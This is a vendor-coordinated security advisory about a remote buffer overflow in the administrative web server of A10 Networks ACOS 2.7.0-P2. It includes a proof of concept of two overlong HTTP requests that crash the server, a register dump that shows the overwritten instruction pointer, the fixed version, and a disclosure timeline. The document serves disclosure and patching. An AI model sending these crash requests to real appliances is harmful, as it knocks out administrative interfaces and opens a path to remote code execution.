• Consulting
  • Information Security
  • Networking
  • Software Development
  • R&D
  • A10 Networks remote Buffer Overflow in ACOS 2.7.0-P2(build: 53) 

    02-04-2014

    A10 Networks

    A10 Networks remote Buffer Overflow

    Quantum Leap Advisory: A10 Networks remote Buffer Overflow in ACOS[1] 2.7.0-P2 – Adivsory #QLA140402
    Affected Product: ACOS 2.7.0-P2(build: 53)  (older versions may be affected too) (Tested on SoftAX[2])
    Credits: Vulnerability discovered by Francesco Perna of Quantum Leap s.r.l

    Executive Summary

    Using a specially crafted HTTP request to the administration web server, it is possible to exploit a lack in the  user input validation. Successful exploitation of the vulnerability may result in remote code execution. Unsuccessful exploitation of the vulnerability may result in a Denial of Service of the administrative interface.

    Proof of Concept

    Submitting arbitrary input in the HTTP request it’s possible to cause a buffer overflow. If you provide an overly long “session id” in the request, the web server crashes. To reproduce the crash you can send one of the following requests to the web server:

    GET /US/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/sys_reboot.html HTTP/1.1
    Host: 192.168.1.210
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: keep-alive

     

    GET /US/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/sys_reboot.html HTTP/1.1
    Host: 192.168.1.210
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: keep-alive

    Once the crash occurs the following is the registers state of the SoftAX appliance:

    rax 0x0 0
    rbx 0x1e30300 31654656
    rcx 0x6 6
    rdx 0xffffffff 4294967295
    rsi 0xcac18f12 3401682706
    rdi 0x4141414141414141 4702111234474983745
    rbp 0x4141414141414141 0x4141414141414141
    rsp 0x7fffbdf9b400 0x7fffbdf9b400
    r8 0x2000 8192
    r9 0x20 32
    r10 0x0 0
    r11 0x7f10b4cec180 139709729653120
    r12 0x0 0
    r13 0x1e30318 31654680
    r14 0x1e30300 31654656
    r15 0x1e33b58 31669080
    rip 0x524149 0x524149
    eflags 0x10246 [ PF ZF IF RF ]
    cs 0x33 51
    ss 0x2b 43
    ds 0x0 0
    es 0x0 0
    fs 0x0 0
    gs 0x0 0
    fctrl 0x37f 895
    fstat 0x0 0
    ftag 0xffff 65535
    fiseg 0x0 0
    fioff 0x0 0
    foseg 0x0 0
    fooff 0x0 0
    fop 0x0 0
    mxcsr 0x1f80 [ IM DM ZM OM UM PM ]

    Solution

    To fix the A10 Networks remote Buffer Overflow you have to upgrade at least to version  2.7.0-p6

    Disclosure Timeline

    2013-05-11 – A10 Networks remote Buffer Overflow discovered
    2013-05-28 – Initial vendor notification
    2013-05-30 – The vendor acknowledge the vulnerability (bug 128069 )
    2014-03-28 – The vendor fixed the vulnerability[3]
    2014-04-02 – Public advisory

    References

    [1] http://www.a10networks.com/about/technology_platform_acos.php
    [2] http://www.a10networks.com/glossary/SoftAX.php
    [3] https://www.a10networks.com/support-axseries/downloads/AX_Series_270-P6_RelNotes_20140328.pdf